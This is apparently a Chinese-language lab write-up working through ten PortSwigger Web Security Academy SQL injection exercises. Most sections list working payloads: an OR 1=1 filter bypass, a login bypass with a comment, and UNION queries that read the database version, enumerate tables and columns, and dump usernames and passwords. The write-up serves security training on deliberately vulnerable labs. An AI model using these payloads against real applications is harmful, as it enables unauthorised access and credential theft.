Burp Web Academy SQL 注入
0x01. PortSwigger Web Security Academy
PortSwigger Web Security Academy 是 Burp Suite 官方推出的免费 Web 安全学习靶场,在学习 Web 安全知识的同时,还可以练习 Burp Suite 的实战技能。
本篇文章讲解 Web Security Academy 之中的 SQL Injection(SQL 注入漏洞)。
0x02. SQL Injection
2.1 Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following:
To solve the lab, perform a SQL injection attack that causes the application to display one or more unreleased products.
最基本的 SQL 注入漏洞,只能说题目有歧义,并不是只要展示出一个未发布的产品就能视为过关。
官方 Payload:/filter?category='+OR+1=1--
2.2 Lab: SQL injection vulnerability allowing login bypass
This lab contains a SQL injection vulnerability in the login function.
To solve the lab, perform a SQL injection attack that logs in to the application as the
administratoruser.
解题 Payload 如下:
1 | csrf=acKaTEUeqj1x7oeKKAytd9wyzlKXjP3I&username=administrator'+and+1%3d1--&password=123 |
注意 1=1 中的 = 要编码为 %3d,否则 POST BODY 参数解析会出问题。
2.3 Lab: SQL injection attack, querying the database type and version on Oracle
This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.
解题 Payload 如下:
1 | GET /filter?category=Accessories'+union+SELECT+banner,'test'+FROM+v$version-- HTTP/2 |
首先,需要知道 Oracle 数据库的版本信息怎么查,这部分可以参考 SQL injection cheat sheet | Web Security Academy。其次,要理解 union 查询的作用和用法(这里要确保列数一致,否则会返回服务器错误)。
SQL UNION 操作符合并两个或多个 SELECT 语句的结果。
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。它可以从多个表中选择数据,并将结果集组合成一个结果集。使用 UNION 时,每个 SELECT 语句必须具有相同数量的列,且对应列的数据类型必须相似。
UNION 操作符默认会去除重复的记录,如果需要保留所有重复记录,可以使用 UNION ALL 操作符。
2.4 Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
To solve the lab, display the database version string.
解题 Payload 如下:
1 | GET /filter?category=Accessories'+union+select+null,%40%40version--+ HTTP/2 |
在 MySQL 中,注释符 -- 之后必须有空格,即 -- comment,所以 Payload 最后有一个 +,否则会提示服务器错误。
2.5 Lab: SQL injection attack, listing the database contents on non-Oracle databases
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the
administratoruser.
首先是猜测数据库类型,不同的数据库本身有一些自带的表,从这些表中可以通过 union 泄露出相关信息。
首先,猜测是 MySQL 数据库,执行如下 Payload:
1 | GET /filter?category=Accessories'+union+select+null,table_name+from+information_schema.tables |
确实获得了很多表名,但是没有排序,通过 order by 2 来排序(注意,执行 union 查询时表头名称通常是第一个结果集的表头,所以如果 order by table_name 会报错):
1 | GET /filter?category=Accessories'+union+select+null,table_name+from+information_schema.tables+order+by+2--+ |
看到一个像是用户信息的表 users_hvpqiw,继续查询列名:
1 | GET /filter?category=Accessories'+union+select+null,column_name+from+information_schema.columns+where+table_name%3d'users_hvpqiw'--+ |
得到列名:
1 | username_sgtfxt |
继续查询用户名和密码信息:
1 | GET /filter?category=Accessories'+union+select+username_sgtfxt,password_iomdmo+from+users_hvpqiw--+ |
得到如下信息:
1 | <tr> |
登录即可完成解题。
2.6 Lab: SQL injection attack, listing the database contents on Oracle
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the
administratoruser.
Oracle 版本 union 脱库攻击。
1 | GET /filter?category=Accessories'+union+select+null,table_name+from+all_tables+order+by+2-- |
得到用户名和密码:
1 | <tr> |
2.7 Lab: SQL injection UNION attack, determining the number of columns returned by the query
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.
To solve the lab, determine the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values.
union 如果两个结果集的列数不一致会出错,一个一个试即可。
1 | GET /filter?category=Accessories'+union+select+null,null,null--+ |
2.8 Lab: SQL injection UNION attack, finding a column containing text
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a previous lab. The next step is to identify a column that is compatible with string data.
The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform a SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.
理解 union 就很简单,提供页面顶部的随机字符串即可:
1 | GET /filter?category=Pets'+union+select+null,'ZDr5hk',null-- |
2.9 Lab: SQL injection UNION attack, retrieving data from other tables
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.
The database contains a different table called
users, with columns calledusernameandpassword.To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the
administratoruser.
不要太简单:
1 | GET /filter?category=Pets'+union+select+username,password+from+users-- |
2.10 Lab: SQL injection UNION attack, retrieving multiple values in a single column
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The database contains a different table called
users, with columns calledusernameandpassword.To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the
administratoruser.
测试下来,结果有两列,第一列是数字,第二列是字符串。
取巧的解法如下(直接把 administrator 的密码查询出来):
1 | GET /filter?category=Pets'+union+select+1,password+from+users+where+username%3d'administrator'-- |
查询所有账号及密码:
1 | GET /filter?category=Pets'+union+select+1,concat(username,'|',password)+from+users-- |
结果如下:
1 | <th>administrator|dxy9iwjpicgz7b98t2kw</th> |
0x03. 小结
- SQL injection cheat sheet | Web Security Academy
union用法- 注释符
--之后最好留一个空格,即-- - 脱库步骤(
union)- 判断列数
- 判断各列数据的类型
- 查询获取数据库中所有的 table 名称
- 获取指定 table 的所有 column 名称
- 脱库
order by除了column name也可以是column index- 字符串处理函数
concat